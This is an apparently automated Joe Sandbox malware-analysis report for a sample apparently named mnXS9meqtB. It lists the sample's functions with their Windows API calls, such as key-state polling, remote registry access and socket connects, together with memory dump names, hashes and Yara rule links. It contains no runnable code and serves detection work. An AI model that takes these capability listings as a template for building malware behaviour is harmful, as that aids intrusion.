                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003606EE
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0036077D
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0036079B
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 003607E1
                                                                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 003607FB
                                                                              • Part of subcall function 0031E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0034A574,?,?,00000000,00000008), ref: 0031E675
                                                                              • Part of subcall function 0031E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0034A574,?,?,00000000,00000008), ref: 0031E699
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 327935632-0
                                                                            • Opcode ID: c6509299cbed0897fb310badcbe1875e830d6c9df7b5382775b404a0f78119b9
                                                                            • Instruction ID: 26f0f3f6a7ea2d15f08d4e3485c62eaa48a0e89b591343c87c2eb282bebe2380
                                                                            • Opcode Fuzzy Hash: c6509299cbed0897fb310badcbe1875e830d6c9df7b5382775b404a0f78119b9
                                                                            • Instruction Fuzzy Hash: 3F515A75A01205DFCB0AEFA8C895DAEB7F9BF18310B05C095E956AB392DB30ED45CB40
                                                                            Function 00362E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00363C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00362EEF
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00362F2E
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00362F75
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00362FA1
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00362FAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3740051246-0
                                                                            • Opcode ID: 2a29ea8eb36dc135a448cff4ba66da40950b6e4fa863d40c9ae9f52532619eff
                                                                            • Instruction ID: 19c4ca335a3863e953134e70833742eb39c0d05d91dbaa561ee312002d88df9c
                                                                            • Opcode Fuzzy Hash: 2a29ea8eb36dc135a448cff4ba66da40950b6e4fa863d40c9ae9f52532619eff
                                                                            • Instruction Fuzzy Hash: F7516771218204AFC706EF64C891EABB7F8FF88704F00896DF5959B2A1DB70E904CB52
                                                                            Function 0036CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fa3f62d58f894970b7934be6126b53cc8911e8b47ea65fde192db8aa525fdde6
                                                                            • Instruction ID: 7a12a49da34288837cba7cb61578120fcb390fbbc11d0e1db05a4765b18e6709
                                                                            • Opcode Fuzzy Hash: fa3f62d58f894970b7934be6126b53cc8911e8b47ea65fde192db8aa525fdde6
                                                                            • Instruction Fuzzy Hash: 1341C139910204ABC722DF68CC48FB9BB78EB09310F169265F999E72E5C671AD11DB90
                                                                            Function 00351206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003512B4
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003512DD
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0035131C
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00351341
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00351349
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1389676194-0
                                                                            • Opcode ID: 18275ddf60b0e9fa37358794cb6b57bb6c6e10a748a18054e841cfda73653fde
                                                                            • Instruction ID: 5ecadbf6cee447f1267b0dfe0dde5fb25c9e3b05906ac44b2df518a6199088dc
                                                                            • Opcode Fuzzy Hash: 18275ddf60b0e9fa37358794cb6b57bb6c6e10a748a18054e841cfda73653fde
                                                                            • Instruction Fuzzy Hash: 8F410A39600205DFCB06EF64C991AAEBBF5EF08310B148095E946AF3A2DB31ED51DF50
                                                                            Function 0031B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(000000FF), ref: 0031B64F
                                                                            • ScreenToClient.USER32(00000000,000000FF), ref: 0031B66C
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 0031B691
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 0031B69F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: 82e61e170eecd4210124c46bacbfcb15f1dc84b95dd43ef2a1ead00c1abbad67
                                                                            • Instruction ID: e6a8ebd99ad38caac911080f781d9a4bc5e7bbe6d58644376e42da3d2aea4287
                                                                            • Opcode Fuzzy Hash: 82e61e170eecd4210124c46bacbfcb15f1dc84b95dd43ef2a1ead00c1abbad67
                                                                            • Instruction Fuzzy Hash: 31416035604219FBCF2A9F64C844AE9FB74BF19324F10835AF82996290C735AD94DF91
                                                                            Function 0033B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 0033B369
                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 0033B413
                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0033B41B
                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 0033B429
                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0033B431
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: 9672f7fd70a5cad459c5212d2e65a301b042abc7872f03ff39f974fa9d442425
                                                                            • Instruction ID: f97205cdccbc3d48faa77e4a9dbd46ecf1508ee3fe1bd872b4d4b1b94f0b77c7
                                                                            • Opcode Fuzzy Hash: 9672f7fd70a5cad459c5212d2e65a301b042abc7872f03ff39f974fa9d442425
                                                                            • Instruction Fuzzy Hash: 9A31AE7190022DEBDF05CF68D98DA9EBBB9EB04325F114269FA21AA1D1C3B09954CB90
                                                                            Function 0033DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 0033DBD7
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0033DBF4
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0033DC2C
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0033DC52
                                                                            • _wcsstr.LIBCMT ref: 0033DC5C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                            • String ID:
                                                                            • API String ID: 3902887630-0
                                                                            • Opcode ID: 8cf3df85caa066a3f0ffe2e533e00b4d8a8906e516346a91b5fc78e85fc2796c
                                                                            • Instruction ID: ab0b29a600eb58d47c5b66057d175547af364e7ae2c60e859424208c6bf2d8f8
                                                                            • Opcode Fuzzy Hash: 8cf3df85caa066a3f0ffe2e533e00b4d8a8906e516346a91b5fc78e85fc2796c
                                                                            • Instruction Fuzzy Hash: BB21D771214204BFEB1B5B39AC89E7B7BADDF45750F118069F809CA191EAA1DC41D3A0
                                                                            Function 0033BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0033BC90
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0033BCC2
                                                                            • __itow.LIBCMT ref: 0033BCDA
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0033BD00
                                                                            • __itow.LIBCMT ref: 0033BD11
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: 9fcb8fc9a40fb756fbb242e308f419659d88c00f5403adf6730d9ca8a90637b2
                                                                            • Instruction ID: 83eca066f2b25e21b514a8860b46862c30728ff3b81220542ead6676692b8163
                                                                            • Opcode Fuzzy Hash: 9fcb8fc9a40fb756fbb242e308f419659d88c00f5403adf6730d9ca8a90637b2
                                                                            • Instruction Fuzzy Hash: 6D21A175600218BBDB23AE659C86FDFBB6CAF5A750F101064FA05EF1C1EB70894587A1
                                                                            Function 00346318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 003050E6: _wcsncpy.LIBCMT ref: 003050FA
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,003460C3), ref: 00346369
                                                                            • GetLastError.KERNEL32(?,?,?,003460C3), ref: 00346374
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003460C3), ref: 00346388
                                                                            • _wcsrchr.LIBCMT ref: 003463AA
                                                                              • Part of subcall function 00346318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003460C3), ref: 003463E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                            • String ID:
                                                                            • API String ID: 3633006590-0
                                                                            • Opcode ID: c5efe0b22f27b3c23804471734e64aff28d6401cfa2f8d4e10f2bf67dfaf83b6
                                                                            • Instruction ID: 22079237b62fa0859d1fdd1c33c86681dfa69b07d4f3444f6dab42ee0a841452
                                                                            • Opcode Fuzzy Hash: c5efe0b22f27b3c23804471734e64aff28d6401cfa2f8d4e10f2bf67dfaf83b6
                                                                            • Instruction Fuzzy Hash: 2F21D8355042555ADB27EF74AC57FEE23ECAF1B360F1004A5F045DF0E1EB60E9848A56
                                                                            Function 00358B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0035A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0035A84E
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00358BD3
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358BE2
                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00358BFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 3701255441-0
                                                                            • Opcode ID: 8049d9126004fea0826f3fc06f4eef858dd47d5908b195ecd47cfa4a21c04452
                                                                            • Instruction ID: d08a72c4454be5ec8a9a76fe582ba00e689fdd3badd49b733a8b11f14b0b35da
                                                                            • Opcode Fuzzy Hash: 8049d9126004fea0826f3fc06f4eef858dd47d5908b195ecd47cfa4a21c04452
                                                                            • Instruction Fuzzy Hash: 6C2190312002149FCB16AF68CC85F7EB7EDAF48711F044559F956AB2E2CF74AC058B51
                                                                            Function 00358420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00358441
                                                                            • GetForegroundWindow.USER32 ref: 00358458
                                                                            • GetDC.USER32(00000000), ref: 00358494
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 003584A0
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 003584DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 0b8e40883628c64b8c61e6534c2aa17a3113fa45d04a847a9214bfec477517c7
                                                                            • Instruction ID: 61c96487ebb2d0d559c286aafd44bf7242a55a3972376ba0dc096ef5ec7992c3
                                                                            • Opcode Fuzzy Hash: 0b8e40883628c64b8c61e6534c2aa17a3113fa45d04a847a9214bfec477517c7
                                                                            • Instruction Fuzzy Hash: A9218475A01204AFDB05EFA5D885E9EB7E9EF48301F048879E8599B291DF70EC04CB50
                                                                            Function 0031AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0031AFE3
                                                                            • SelectObject.GDI32(?,00000000), ref: 0031AFF2
                                                                            • BeginPath.GDI32(?), ref: 0031B009
                                                                            • SelectObject.GDI32(?,00000000), ref: 0031B033
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 4289f98ed12d599fd69427d3e6496561d21da1fc7f54f907daa9637d2ee52a05
                                                                            • Instruction ID: 4f75fca558a465a81eb7835a7ef6c4c1ec767aff7141eec2d6fd059f8a90167a
                                                                            • Opcode Fuzzy Hash: 4289f98ed12d599fd69427d3e6496561d21da1fc7f54f907daa9637d2ee52a05
                                                                            • Instruction Fuzzy Hash: 60216DB0800305AFDB279F55EC48B9A7B6CBB19366F14421AE825D61A1C370A8A5AB91
                                                                            Function 0032217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __calloc_crt.LIBCMT ref: 003221A9
                                                                            • CreateThread.KERNEL32(?,?,003222DF,00000000,?,?), ref: 003221ED
                                                                            • GetLastError.KERNEL32 ref: 003221F7
                                                                            • _free.LIBCMT ref: 00322200
                                                                            • __dosmaperr.LIBCMT ref: 0032220B
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                            • String ID:
                                                                            • API String ID: 2664167353-0
                                                                            • Opcode ID: a1932e44e462ffae0e6d3b02a4ce566f55360b945074b5047f5f61866916f2d0
                                                                            • Instruction ID: beade68d4eb906d54b055aed72a00831bdc7cd5672ebe3499425f7f8d51f998a
                                                                            • Opcode Fuzzy Hash: a1932e44e462ffae0e6d3b02a4ce566f55360b945074b5047f5f61866916f2d0
                                                                            • Instruction Fuzzy Hash: 9B11C432104366BFDB13AFA5FD42DAB7B98EF45B70B110429F9148A192EB72D81187A1
                                                                            Function 0033ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0033ABD7
                                                                            • GetLastError.KERNEL32(?,0033A69F,?,?,?), ref: 0033ABE1
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,0033A69F,?,?,?), ref: 0033ABF0
                                                                            • HeapAlloc.KERNEL32(00000000,?,0033A69F,?,?,?), ref: 0033ABF7
                                                                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0033AC0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            • Opcode ID: e0f40a3f11e5bb8146c8a58d1bb400aa758242b91466c1070d67dc1194611a7d
                                                                            • Instruction ID: 083bbd5e59c58bc8d4289034905527c9307c0a39701796619ca1664dc3ac711c
                                                                            • Opcode Fuzzy Hash: e0f40a3f11e5bb8146c8a58d1bb400aa758242b91466c1070d67dc1194611a7d
                                                                            • Instruction Fuzzy Hash: E4011971200204BFDB125FA9EC88DAB7BADFF8A755B110469F946C32A0DA719C40CB61
                                                                            Function 00347A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347A74
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00347A82
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00347A8A
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00347A94
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347AD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
